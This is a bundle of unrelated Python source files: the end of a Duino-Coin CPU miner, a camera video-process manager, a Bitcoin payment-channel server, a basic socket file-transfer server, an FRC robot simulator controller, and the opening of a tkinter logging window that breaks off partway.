+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
else:
# If result was incorrect
rejected.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Style.BRIGHT
+ Back.RESET
+ Fore.RED
+ " ✗"
+ getString("rejected")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
end_time = time()
elapsed_time = end_time - start_time
if (threadid == 0
and elapsed_time >= PERIODIC_REPORT_TIME):
report_shares = accepted.value - report_shares
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time,
end_time,
report_shares,
totalhashrate,
uptime)
start_time = time()
break
break
except Exception as e:
pretty_print(
"net"
+ str(threadid),
getString("error_while_mining")
+ Style.NORMAL
+ Fore.RESET
+ " (mining err: "
+ str(e)
+ ")",
"error")
debug_output("Error while mining: " + str(e))
sleep(5)
break
def periodic_report(start_time,
end_time,
shares,
hashrate,
uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" Periodic mining report (BETA): "
+ Fore.RESET
+ Style.NORMAL
+ "\n\t\t‖ During the last "
+ str(seconds)
+ " seconds"
+ "\n\t\t‖ You've mined "
+ str(shares)
+ " shares ("
+ str(round(shares/seconds, 1))
+ " shares/s)"
+ "\n\t\t‖ With the hashrate of "
+ str(int(hashrate)) + " kH/s"
+ "\n\t\t‖ In this time period, you've solved "
+ str(int(hashrate*seconds))
+ " hashes"
+ "\n\t\t‖ Total miner uptime: "
+ str(uptime), "success")
def pretty_print(message_type, message, state):
# Prints colored output messages
# Usb/net/sys background
if message_type.startswith("net"):
background = Back.BLUE
elif message_type.startswith("cpu"):
background = Back.YELLOW
if message_type.startswith("sys"):
background = Back.GREEN
# Text color
if state == "success":
color = Fore.GREEN
elif state == "warning":
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ background
+ " "
+ message_type
+ " "
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def initRichPresence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
debug_output("Discord rich presence initialized")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
def updateRichPresence():
# Update rich presence status
startTime = int(time())
while True:
try:
# Calculate average total hashrate with prefix
totalhashrate = mean(totalhashrate_mean[-20:])
if totalhashrate > 800:
totalhashrate = str(round(totalhashrate / 1000, 2)) + " MH/s"
else:
totalhashrate = str(round(totalhashrate, 1)) + " kH/s"
RPC.update(
details="Hashrate: " + str(totalhashrate),
start=startTime,
state="Acc. shares: "
+ str(accepted.value)
+ "/"
+ str(rejected.value + accepted.value),
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
debug_output("Rich presence updated")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
sleep(15) # 15 seconds to respect Discord rate limit
def get_fastest_connection(server_ip: str):
connection_pool = []
available_connections = []
for i in range(len(AVAILABLE_PORTS)):
connection_pool.append(socket())
connection_pool[i].setblocking(0)
try:
connection_pool[i].connect((server_ip,
AVAILABLE_PORTS[i]))
connection_pool[i].settimeout(SOC_TIMEOUT)
except BlockingIOError as e:
pass
ready_connections, _, __ = select.select(connection_pool, [], [])
while True:
for connection in ready_connections:
try:
server_version = connection.recv(5).decode()
except:
continue
if server_version == b'':
continue
available_connections.append(connection)
connection.send(b'PING')
ready_connections, _, __ = select.select(available_connections, [], [])
ready_connections[0].recv(4)
return ready_connections[0].getpeername()[1]
def fetch_pools():
while True:
pretty_print("net0",
" "
+ getString("connection_search")
+ "...",
"warning")
try:
response = requests.get(
"https://server.duinocoin.com/getPool"
).json()
pretty_print("net0",
" Retrieved mining node: "
+ Fore.RESET
+ Style.NORMAL
+ str(response["name"]),
"success")
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return NODE_ADDRESS, NODE_PORT
except Exception as e:
pretty_print("net0",
" Error retrieving mining node: "
+ str(e)
+ ", retrying in 15s",
"error")
sleep(15)
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
cpu = cpuinfo.get_cpu_info()
title(getString("duco_python_miner") + str(MINER_VER) + ")")
if osname == "nt":
# Unicode fix for windows
ossystem("chcp 65001")
# Colorama
init(autoreset=True)
try:
from multiprocessing import (
Manager,
Process,
Value,
cpu_count,
current_process
)
manager = Manager()
# Multiprocessing globals
khashcount = Value("i", 0)
accepted = Value("i", 0)
rejected = Value("i", 0)
hashrates_list = manager.dict()
totalhashrate_mean = manager.list()
except Exception as e:
print(e)
pretty_print(
"sys0",
" Multiprocessing is not available. "
+ "Please check permissions and/or your python installation. "
+ "Exiting in 10s.",
"error")
sleep(10)
_exit(1)
try:
# Load config file or create new one
loadConfig()
debug_output("Config file loaded")
except Exception as e:
pretty_print(
"sys0",
getString("load_config_error")
+ RESOURCES_DIR
+ getString("load_config_error_warning")
+ Style.NORMAL
+ Fore.RESET
+ " (config load err: "
+ str(e)
+ ")",
"error")
debug_output("Error reading configfile: " + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
Greeting()
debug_output("Greeting displayed")
except Exception as e:
pretty_print(
"sys0",
"Error displaying greeting message"
+ Style.NORMAL
+ Fore.RESET
+ " (greeting err: "
+ str(e)
+ ")",
"error")
debug_output("Error displaying greeting message: " + str(e))
try:
# Start donation thread
Donate()
except Exception as e:
debug_output("Error launching donation thread: " + str(e))
try:
NODE_ADDRESS, NODE_PORT = fetch_pools()
except:
NODE_ADDRESS = "server.duinocoin.com"
NODE_PORT = 2813
debug_output("Using default server port and address")
try:
for x in range(int(threadcount)):
# Launch duco mining threads
thread.append(x)
thread[x] = Process(
target=Thread,
args=(
x,
accepted,
rejected,
requested_diff,
khashcount,
username,
efficiency,
rig_identiier,
algorithm,
hashrates_list,
totalhashrate_mean,
NODE_ADDRESS,
NODE_PORT))
thread[x].start()
if x > 4 and x % 4 == 0:
# Don't launch burst of threads
# to not get banned
sleep(5)
else:
sleep(0.1)
except Exception as e:
pretty_print(
"sys0",
"Error launching CPU thread(s)"
+ Style.NORMAL
+ Fore.RESET
+ " (cpu launch err: "
+ str(e)
+ ")",
"error")
debug_output("Error launching CPU thead(s): " + str(e))
if discord_presence == "y":
try:
# Discord rich presence threads
initRichPresence()
thrThread(
target=updateRichPresence).start()
except Exception as e:
debug_output("Error launching Discord RPC thead: " + str(e))
|
process.py
|
import multiprocessing
import os
import signal
import sys
import time
from pyramid.paster import get_appsettings
from threading import Thread
from .http import create_server
from ..models import (
get_engine,
get_session_factory,
Camera,
)
from .video import VideoStream
class ExitException(Exception):
pass
def sigterm_handler(signal_number, stack_frame):
raise ExitException
class VideoProcess(multiprocessing.Process):
def __init__(self, camera, dbsession):
super(VideoProcess, self).__init__()
self.camera = camera
self.dbsession = dbsession
self.exit = multiprocessing.Event()
def run(self):
try:
video_stream = VideoStream(
num=self.camera.src,
detection=self.camera.detection_enabled)
video_stream.start()
server = create_server(
self.camera.host, self.camera.port, video_stream)
thread = Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
while not self.exit.is_set():
self.dbsession.refresh(self.camera)
if not self.camera.enabled:
self.shutdown()
return
video_stream.detection = self.camera.detection_enabled
time.sleep(0.5)
except ExitException:
video_stream.stop()
server.shutdown()
video_stream.join()
thread.join()
def shutdown(self):
self.exit.set()
def start_processes(processes, dbsession):
# Cleanup old process
for p in [p for p in processes if not p.is_alive()]:
processes.remove(p)
cams = dbsession.query(Camera).filter_by(enabled=True).all()
started_cams = [p.camera for p in processes]
for cam in cams:
if cam not in started_cams:
# start missing process
p = VideoProcess(cam, dbsession)
processes.append(p)
p.start()
def run(dbsession):
signal.signal(signal.SIGTERM, sigterm_handler)
signal.signal(signal.SIGINT, sigterm_handler)
try:
processes = []
while True:
start_processes(processes, dbsession)
time.sleep(0.5)
except ExitException:
for p in processes:
p.shutdown()
for p in processes:
p.join()
def usage(argv):
cmd = os.path.basename(argv[0])
print('usage: %s <config_uri>\n'
'(example: "%s production.ini")' % (cmd, cmd))
sys.exit(1)
def main(argv=sys.argv):
if len(argv) != 2:
usage(argv)
config_uri = argv[1]
settings = get_appsettings(config_uri)
engine = get_engine(settings)
session_factory = get_session_factory(engine)
run(session_factory())
if __name__ == '__main__':
main()
|
payment_server.py
|
"""This module implements the server side of payment channels."""
import os
import time
import codecs
import threading
import contextlib
from two1.bitcoin.utils import pack_u32
from two1.bitcoin import Transaction, Hash, Signature, Script
from two1.channels.statemachine import PaymentChannelRedeemScript
from two1.channels.blockchain import TwentyOneBlockchain
from .wallet import Two1WalletWrapper
from .models import DatabaseSQLite3, ChannelSQLite3, Channel
class PaymentServerError(Exception):
"""Generic exception for payment channel processing errors."""
pass
class RedeemPaymentError(PaymentServerError):
"""Raised when the payment server fails to redeem a payment."""
pass
class ChannelClosedError(PaymentServerError):
"""Raised when attempting to access a channel that has been closed."""
pass
class PaymentChannelNotFoundError(PaymentServerError):
"""Raised when attempting to access a channel that does not exist."""
pass
class BadTransactionError(PaymentServerError):
"""Raised when an incorrect or malformed transaction is provided by a client."""
pass
class TransactionVerificationError(PaymentServerError):
"""Raised when the server fails to verify the validity of a transaction."""
pass
class Lock(contextlib.ContextDecorator):
"""An inter-thread lock decorator."""
def __init__(self):
"""Return a new Lock instance."""
self.tlock = threading.Lock()
def __enter__(self):
self.tlock.acquire()
def __exit__(self, exc_type, exc_value, traceback):
self.tlock.release()
class PaymentServer:
"""Payment channel handling.
This class handles the server-side implementation of payment channels from
handshake to channel close. It also implements the ability for an API
server to redeem micropayments made within the channel.
"""
DEFAULT_TWENTYONE_BLOCKCHAIN_URL = os.environ.get(
"TWO1_PROVIDER_HOST", "https://blockchain.21.co") + "/blockchain/bitcoin"
"""Default mainnet blockchain URL."""
DEFAULT_TWENTYONE_TESTNET_BLOCKCHAIN_URL = os.environ.get(
"TWO1_PROVIDER_HOST", "https://blockchain.21.co") + "/blockchain/testnet3"
"""Default testnet blockchain URL."""
MIN_TX_FEE = 5000
"""Minimum transaction fee for payment channel deposit/payment."""
DUST_LIMIT = 3000
"""Minimum payment amount (dust limit) for any transaction output."""
MIN_EXP_TIME = 12 * 3600
"""Minimum expiration time (in sec) for a payment channel refund."""
EXP_TIME_BUFFER = 4 * 3600
"""Buffer time before expiration (in sec) in which to broadcast payment."""
PROTOCOL_VERSION = 2
"""Payment channel protocol version."""
lock = Lock()
"""Thread and process lock for database access."""
def __init__(self, wallet, db=None, account='default', testnet=False,
blockchain=None, zeroconf=False, sync_period=600, db_dir=None):
"""Initalize the payment server.
Args:
wallet (.wallet.Two1WalletWrapper): a two1 wallet wrapped with
payment server functionality.
db (.models.ChannelDataManager): a database wrapper to manage the
payment channel server's interface with a persistent store of
data.
account (string): which account within the wallet to use (e.g.
'merchant', 'customer', 'default', etc).
testnet (boolean): whether or not the server should broadcast and
verify transactions against the bitcoin testnet blockchain.
blockchain (two1.blockchain.provider): a blockchain data
provider capable of broadcasting raw transactions.
zeroconf (boolean): whether or not to use a payment channel before
the deposit transaction has been confirmed by the network.
sync_period (integer): how often to sync channel status (in sec).
"""
self.zeroconf = zeroconf
self._wallet = Two1WalletWrapper(wallet, account)
self._blockchain = blockchain
self._db = db
if db is None:
self._db = DatabaseSQLite3(db_dir=db_dir)
if blockchain is None:
self._blockchain = TwentyOneBlockchain(
PaymentServer.DEFAULT_TWENTYONE_BLOCKCHAIN_URL if not self._wallet._wallet.testnet else
PaymentServer.DEFAULT_TWENTYONE_TESTNET_BLOCKCHAIN_URL)
self._sync_stop = threading.Event()
self._sync_thread = threading.Thread(target=self._auto_sync, args=(sync_period, self._sync_stop), daemon=True)
self._sync_thread.start()
def identify(self):
"""Query the payment server's merchant information and server configuration.
Returns:
(dict): a key-value store that contains the merchant's public key and other custom config.
"""
return dict(public_key=self._wallet.get_public_key(),
version=self.PROTOCOL_VERSION,
zeroconf=self.zeroconf)
@lock
def open(self, deposit_tx, redeem_script):
"""Open a payment channel.
Args:
deposit_tx (string): signed deposit transaction which pays to a
2 of 2 multisig script hash.
redeem_script (string): the redeem script that comprises the script
hash so that the merchant can verify.
Returns:
(string): deposit transaction id
"""
# Parse payment channel `open` parameters
deposit_tx = Transaction.from_hex(deposit_tx)
redeem_script = PaymentChannelRedeemScript.from_bytes(codecs.decode(redeem_script, 'hex_codec'))
# Verify that the deposit pays to the redeem script
output_index = deposit_tx.output_index_for_address(redeem_script.hash160())
if output_index is None:
raise BadTransactionError('Deposit does not pay to the provided script hash.')
# Parse payment channel data for open
deposit_txid = str(deposit_tx.hash)
merch_pubkey = codecs.encode(redeem_script.merchant_public_key.compressed_bytes, 'hex_codec').decode()
amount = deposit_tx.outputs[output_index].value
# Verify that one of the public keys belongs to the merchant
valid_merchant_public_key = self._wallet.validate_merchant_public_key(redeem_script.merchant_public_key)
if not valid_merchant_public_key:
raise BadTransactionError('Public key does not belong to the merchant.')
# Verify that the deposit is not already part of a payment channel
if self._db.pc.lookup(deposit_txid):
raise BadTransactionError('That deposit has already been used to create a channel.')
# Verify that the lock time is an allowable amount in the future
minimum_locktime = int(time.time()) + self.MIN_EXP_TIME
if redeem_script.expiration_time < minimum_locktime:
raise TransactionVerificationError('Transaction locktime must be further in the future.')
# Open and save the payment channel
self._db.pc.create(deposit_tx, merch_pubkey, amount, redeem_script.expiration_time)
# Set the channel to `ready` if zeroconf is enabled
if self.zeroconf:
self._db.pc.update_state(deposit_txid, ChannelSQLite3.READY)
return str(deposit_tx.hash)
@lock
def receive_payment(self, deposit_txid, payment_tx):
"""Receive and process a payment within the channel.
The customer makes a payment in the channel by sending the merchant a
half-signed payment transaction. The merchant signs the other half of
the transaction and saves it in its records (but does not broadcast it
or send it to the customer). The merchant responds with 200 to verify
that the payment was handled successfully.
Args:
deposit_txid (string): string representation of the deposit
transaction hash. This is used to look up the payment channel.
payment_tx (string): half-signed payment transaction from a
customer.
Returns:
(string): payment transaction id
"""
# Parse payment channel `payment` parameters
payment_tx = Transaction.from_hex(payment_tx)
# Get channel and addresses related to the deposit
channel = self._db.pc.lookup(deposit_txid)
if not channel:
raise PaymentChannelNotFoundError('Related channel not found.')
# Get merchant public key information from payment channel
redeem_script = PaymentChannelRedeemScript.from_bytes(payment_tx.inputs[0].script[-1])
merch_pubkey = redeem_script.merchant_public_key
# Verify that the payment has a valid signature from the customer
txn_copy = payment_tx._copy_for_sig(0, Transaction.SIG_HASH_ALL, redeem_script)
msg_to_sign = bytes(Hash.dhash(bytes(txn_copy) + pack_u32(Transaction.SIG_HASH_ALL)))
sig = Signature.from_der(payment_tx.inputs[0].script[0][:-1])
if not redeem_script.customer_public_key.verify(msg_to_sign, sig, False):
raise BadTransactionError('Invalid payment signature.')
# Verify the length of the script is what we expect
if len(payment_tx.inputs[0].script) != 3:
raise BadTransactionError('Invalid payment channel transaction structure.')
# Verify the script template is valid for accepting a merchant signature
if (not Script.validate_template(payment_tx.inputs[0].script, [bytes, 'OP_1', bytes]) and
not Script.validate_template(payment_tx.inputs[0].script, [bytes, 'OP_TRUE', bytes])):
raise BadTransactionError('Invalid payment channel transaction structure.')
# Verify that the payment channel is ready
if channel.state == ChannelSQLite3.CONFIRMING:
confirmed = self._blockchain.check_confirmed(channel.deposit_txid)
if confirmed:
self._db.pc.update_state(channel.deposit_txid, ChannelSQLite3.READY)
else:
raise ChannelClosedError('Payment channel not ready.')
elif channel.state == ChannelSQLite3.CLOSED:
raise ChannelClosedError('Payment channel closed.')
# Verify that payment is made to the merchant's pubkey
index = payment_tx.output_index_for_address(merch_pubkey.hash160())
if index is None:
raise BadTransactionError('Payment must pay to merchant pubkey.')
# Verify that both payments are not below the dust limit
for output_index, output in enumerate(payment_tx.outputs):
if output.value < PaymentServer.DUST_LIMIT:
# Payment to merchant is less than dust limit
if output_index == index:
raise BadTransactionError(
'Initial payment must be greater than {}.'.format(PaymentServer.DUST_LIMIT))
# Payment to customer is less than dust limit
else:
raise BadTransactionError(
'Payment channel balance is not large enough to make payment.')
# Validate that the payment is more than the last one
new_pmt_amt = payment_tx.outputs[index].value
if new_pmt_amt <= channel.last_payment_amount:
raise BadTransactionError('Payment must be greater than 0.')
# Verify that the transaction has adequate fees
net_pmt_amount = sum([d.value for d in payment_tx.outputs])
deposit_amount = channel.amount
if deposit_amount < net_pmt_amount + PaymentServer.MIN_TX_FEE:
raise BadTransactionError('Payment must have adequate fees.')
# Update the current payment transaction
self._db.pc.update_payment(deposit_txid, payment_tx, new_pmt_amt)
self._db.pmt.create(deposit_txid, payment_tx, new_pmt_amt - channel.last_payment_amount)
return str(payment_tx.hash)
def status(self, deposit_txid):
"""Get a payment channel's current status.
Args:
deposit_txid (string): string representation of the deposit
transaction hash. This is used to look up the payment channel.
"""
channel = self._db.pc.lookup(deposit_txid)
if not channel:
raise PaymentChannelNotFoundError('Related channel not found.')
return dict(status=channel.state,
balance=channel.last_payment_amount,
time_left=channel.expires_at)
@lock
def close(self, deposit_txid, deposit_txid_signature):
"""Close a payment channel.
Args:
deposit_txid (string): string representation of the deposit
transaction hash. This is used to look up the payment channel.
deposit_txid_signature (two1.bitcoin.Signature): a signature
consisting solely of the deposit_txid to verify the
authenticity of the close request.
"""
channel = self._db.pc.lookup(deposit_txid)
# Verify that the requested channel exists
if not channel:
raise PaymentChannelNotFoundError('Related channel not found.')
# Parse payment channel `close` parameters
try:
signature_der = codecs.decode(deposit_txid_signature, 'hex_codec')
deposit_txid_signature = Signature.from_der(signature_der)
except TypeError:
raise TransactionVerificationError('Invalid signature provided.')
# Verify that there is a valid payment to close
if not channel.payment_tx:
raise BadTransactionError('No payments made in channel.')
# Verify that the user is authorized to close the channel
payment_tx = channel.payment_tx
redeem_script = PaymentChannelRedeemScript.from_bytes(payment_tx.inputs[0].script[-1])
sig_valid = redeem_script.customer_public_key.verify(
deposit_txid.encode(), deposit_txid_signature)
if not sig_valid:
raise TransactionVerificationError('Invalid signature.')
# Sign the final transaction
self._wallet.sign_half_signed_payment(payment_tx, redeem_script)
# Broadcast payment transaction to the blockchain
self._blockchain.broadcast_tx(payment_tx.to_hex())
# Record the broadcast in the database
self._db.pc.update_state(deposit_txid, ChannelSQLite3.CLOSED)
return str(payment_tx.hash)
@lock
def redeem(self, payment_txid):
"""Determine the validity and amount of a payment.
Args:
payment_txid (string): the hash in hexadecimal of the payment
transaction, often referred to as the transaction id.
Returns:
pmt_amount (int): value in satoshis of the incremental payment.
Raises:
PaymentError: reason why payment is not redeemable.
"""
# Verify that we have this payment transaction saved
payment = self._db.pmt.lookup(payment_txid)
if not payment:
raise PaymentChannelNotFoundError('Payment not found.')
# Verify that this payment exists within a channel
channel = self._db.pc.lookup(payment.deposit_txid)
if not channel:
raise PaymentChannelNotFoundError('Channel not found.')
# Verify that the payment channel is ready
if channel.state == ChannelSQLite3.CONFIRMING:
raise ChannelClosedError('Payment channel not ready.')
elif channel.state == ChannelSQLite3.CLOSED:
raise ChannelClosedError('Payment channel closed.')
# Calculate and redeem the current payment
redeem_success = self._db.pmt.redeem(payment_txid)
# Verify that the payment has not already been redeemed
if not redeem_success:
raise RedeemPaymentError('Payment already redeemed.')
return payment.amount
@lock
def sync(self):
"""Sync the state of all payment channels."""
# Look up all channels
channel_query = self._db.pc.lookup()
# Check whether the return result is a single Channel or list
if isinstance(channel_query, Channel):
payment_channels = [channel_query]
else:
payment_channels = channel_query
# Return if there are no payment channels to sync
if not payment_channels:
return
for pc in payment_channels:
# Skip sync if channel is closed
if pc.state == ChannelSQLite3.CLOSED:
continue
# Check for deposit confirmation
if pc.state == ChannelSQLite3.CONFIRMING and self._blockchain.check_confirmed(pc.deposit_txid):
self._db.pc.update_state(pc.deposit_txid, ChannelSQLite3.READY)
# Check if channel got closed
if pc.state in (ChannelSQLite3.CONFIRMING, ChannelSQLite3.READY) and pc.payment_tx:
redeem_script = PaymentChannelRedeemScript.from_bytes(pc.payment_tx.inputs[0].script[-1])
deposit_tx_utxo_index = pc.deposit_tx.output_index_for_address(redeem_script.hash160())
spend_txid = self._blockchain.lookup_spend_txid(pc.deposit_txid, deposit_tx_utxo_index)
if spend_txid:
self._db.pc.update_state(pc.deposit_txid, ChannelSQLite3.CLOSED)
# Check for channel expiration
if pc.state != ChannelSQLite3.CLOSED:
if time.time() + PaymentServer.EXP_TIME_BUFFER > pc.expires_at and pc.payment_tx:
redeem_script = PaymentChannelRedeemScript.from_bytes(pc.payment_tx.inputs[0].script[-1])
self._wallet.sign_half_signed_payment(pc.payment_tx, redeem_script)
self._blockchain.broadcast_tx(pc.payment_tx.to_hex())
self._db.pc.update_payment(pc.deposit_txid, pc.payment_tx, pc.last_payment_amount)
self._db.pc.update_state(pc.deposit_txid, ChannelSQLite3.CLOSED)
def _auto_sync(self, timeout, stop_event):
"""Lightweight thread for automatic channel syncs."""
while not stop_event.is_set():
stop_event.wait(timeout)
self.sync()
|
server.py
|
import socket
import threading
import time
header = 64
port = 5000
disconnect_msg = b'quit'
SERVER = '10.0.0.3'
Address = (SERVER, port)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(Address)
server.setblocking(True)
def handle(con, adr):
print(f"[New Connection] {adr} connected.")
connected = True
f = None
first = False
length = None
start_time = None
while connected:
length = con.recv(header)
if not length:
break
if not start_time:
start_time = time.time()
ind = length.find(b' ')
length = int(length[:ind])
print(f"{length} Bytes")
reading = True
while reading and length != 0:
if f:
msg = con.recv(1024)
else:
msg = con.recv(length)
if not msg:
connected = False
break
if msg == b'small':
f = open('small_of_' + adr[0] + '.txt', 'bw')
first = True
elif msg == b'medium':
f = open('medium_of_' + adr[0] + '.mp3', 'bw')
first = True
elif msg == b'huge':
f = open('huge_of_' + adr[0] + '.mp4', 'bw')
first = True
else:
f.write(msg)
if first:
reading = False
first = False
con.close()
if f:
print("Message received in %s milliseconds\n" % int((time.time() - start_time)*1000))
f.close()
def start():
print(f"Listening on {SERVER}\n")
server.listen()
while True:
con, adr = server.accept()
thread = threading.Thread(target=handle, args=(con, adr))
thread.start()
print(f"[Active connections] {threading.activeCount() - 1}")
start()
|
robot_controller.py
|
'''
This manages the active state of the robot
'''
import sys
import threading
import time
from ..wpilib import _wpilib
from .sim_manager import SimManager
class RobotController(object):
mode_map = {
SimManager.MODE_AUTONOMOUS: "Autonomous",
SimManager.MODE_DISABLED: "Disabled",
SimManager.MODE_OPERATOR_CONTROL: "OperatorControl"
}
def __init__(self, myrobot):
self.mode = SimManager.MODE_DISABLED
self.mode_callback = None
self.myrobot = myrobot
# attach to the robot
_wpilib.internal.on_IsEnabled = self.on_IsEnabled
_wpilib.internal.on_IsAutonomous = self.on_IsAutonomous
_wpilib.internal.on_IsOperatorControl = self.on_IsOperatorControl
# any data shared with the ui must be protected by
# this since it's running in a different thread
self._lock = threading.RLock()
self.thread = threading.Thread(target=self._robot_thread)
self.thread.daemon = True
def run(self):
self._run_code = True
self.thread.start()
def stop(self):
with self._lock:
self._run_code = False
# if the robot code is spinning in any of the modes, then
# we need to change the mode so it returns back to us
if self.mode == SimManager.MODE_DISABLED:
self.mode = SimManager.MODE_OPERATOR_CONTROL
else:
self.mode = SimManager.MODE_DISABLED
# resume the robot just in case it's hung somewhere
_wpilib._fake_time.FAKETIME.Resume()
try:
self.thread.join(timeout=5.0)
except RuntimeError:
return False
return not self.thread.is_alive()
#
# API used by the ui
#
def is_alive(self):
return self.thread.is_alive()
def on_mode_change(self, callable):
'''When the robot mode changes, call the function with the mode'''
with self._lock:
self.mode_callback = callable
def set_joystick(self, x, y):
'''
Receives joystick values from the ui
'''
with self._lock:
drive_stick = self.driver_station.sticks[0]
drive_stick[1] = x
drive_stick[2] = y
def set_mode(self, mode):
if mode not in [SimManager.MODE_DISABLED,
SimManager.MODE_AUTONOMOUS,
SimManager.MODE_OPERATOR_CONTROL]:
raise ValueError("Invalid value for mode: %s" % mode)
with self._lock:
# TODO: need a way to notify the caller that the set failed. Perhaps an exception?
if not self.is_alive():
return
old_mode = self.mode
self.mode = mode
callback = self.mode_callback
# don't call from inside the lock
if old_mode != mode and callback is not None:
callback(mode)
def get_mode(self):
with self._lock:
return self.mode
#
# Runs the code
#
def _check_sleep(self, idx):
'''This ensures that the robot code called Wait() at some point'''
# TODO: There are some cases where it would be ok to do this...
if not _wpilib._fake_time.FAKETIME.slept[idx]:
errstr = '%s() function is not calling wpilib.Wait() in its loop!' % self.mode_map[self.mode]
raise RuntimeError(errstr)
_wpilib._fake_time.FAKETIME.slept[idx] = False
def on_IsEnabled(self):
with self._lock:
self._check_sleep(0)
return self.mode != SimManager.MODE_DISABLED
def on_IsAutonomous(self, tm):
with self._lock:
self._check_sleep(1)
if not self._run_code:
return False
return self.mode == SimManager.MODE_AUTONOMOUS
def on_IsOperatorControl(self, tm):
with self._lock:
self._check_sleep(2)
if not self._run_code:
return False
return self.mode == SimManager.MODE_OPERATOR_CONTROL
def on_WatchdogError(self, last_fed, period, expiration):
print('WATCHDOG FAILURE! Last fed %0.3f seconds ago (expiration: %0.3f seconds)' %
(period, expiration), file=sys.stderr)
self.set_mode(SimManager.MODE_DISABLED)
def _robot_thread(self):
# setup things for the robot
self.driver_station = _wpilib.DriverStation.GetInstance()
self.myrobot.watchdog.error_handler = self.on_WatchdogError
last_mode = None
try:
while True:
with self._lock:
mode = self.mode
if not self._run_code:
break
# Detect if the code is implemented improperly
# -> This error occurs if the robot returns from one of its
# functions for any reason other than a mode change, as
# this is the only acceptable reason for this to occur
if last_mode is not None:
if last_mode == mode and mode != SimManager.MODE_DISABLED:
errstr = '%s() function returned before the mode changed' % SimManager.mode_map[last_mode]
raise RuntimeError(errstr)
# reset this, just in case
_wpilib._fake_time.FAKETIME.slept = [True]*3
if last_mode != mode:
if mode == SimManager.MODE_DISABLED:
self.myrobot.Disabled()
elif mode == SimManager.MODE_AUTONOMOUS:
self.myrobot.Autonomous()
elif mode == SimManager.MODE_OPERATOR_CONTROL:
self.myrobot.OperatorControl()
# make sure infinite loops don't kill the processor...
time.sleep(0.001)
last_mode = mode
finally:
self.myrobot.GetWatchdog().SetEnabled(False)
self.set_mode(SimManager.MODE_DISABLED)
|
gui.py
|
from pathlib import Path
import tkinter as tk
import tkinter.messagebox
import tkinter.filedialog
from tkinter.scrolledtext import ScrolledText
import _tkinter
import time
import logging
import threading
import queue
import tkinter.font as font
from stitch_MAPS_annotations import Stitcher
from sites_of_interest_parser import MapsXmlParser
# TODO: Figure out how to run pyimagej and tkinter at the same time on Macs, see suggestions here:
# https://github.com/imagej/pyimagej/issues/39
# import imagej
# ij = imagej.init('/Applications/Fiji.app')
class QueueHandler(logging.Handler):
"""Class that accepts logs and adds them to a queue
"""
# Based on: https://github.com/beenje/tkinter-logging-text-widget
def __init__(self, logging_queue):
super().__init__()
self.logging_queue = logging_queue
def emit(self, log_statement):
self.logging_queue.put(log_statement)
class LoggingWindow:
# Based on: https://github.com/beenje/tkinter-logging-text-widget
def __init__(self, master):
self.master = master
self.scrolled_text = ScrolledText(master=master, state='disabled', height=15)
self.scrolled_text.grid(row=0, column=0)
self.scrolled_text.configure(font='TkFixedFont')
self.scrolled_text.tag_config('INFO', foreground='black')
self.scrolled_text.tag_config('DEBUG', foreground='gray')
self.scrolled_text.tag_config('WARNING', foreground='orange')
self.scrolled_text.tag_config('ERROR', foreground='red')
# Get the logger
self.logger = logging.getLogger()
self.log_queue = queue.Queue()
self.queue_handler = QueueHandler(self.log_queue)
formatter = logging.Formatter('%(asctime)s : %(levelname)s : %(message)s')
self.queue_handler.setFormatter(formatter)
self.logger.addHandler(self.queue_handler)
# Start polling messages from the queue
self.master.after(100, self.poll_log_queue)
self.autoscroll = tk.BooleanVar()
tk.Checkbutton(master, text='Autoscroll Log', variable=self.autoscroll).\
grid(row=1, column=0, sticky=tk.W)
self.autoscroll.set(True)
def display(self, record):
msg = self.queue_handler.format(record)
self.scrolled_text.configure(state='normal')
self.scrolled_text.insert(tk.END, msg + '\n', record.levelname)
self.scrolled_text.configure(state='disabled')
# Autoscroll to the bottom
if self.autoscroll.get():
self.scrolled_text.yview(tk.END)
def poll_log_queue(self):
# Check every 100ms if there is a new message in the queue to display
while True:
try:
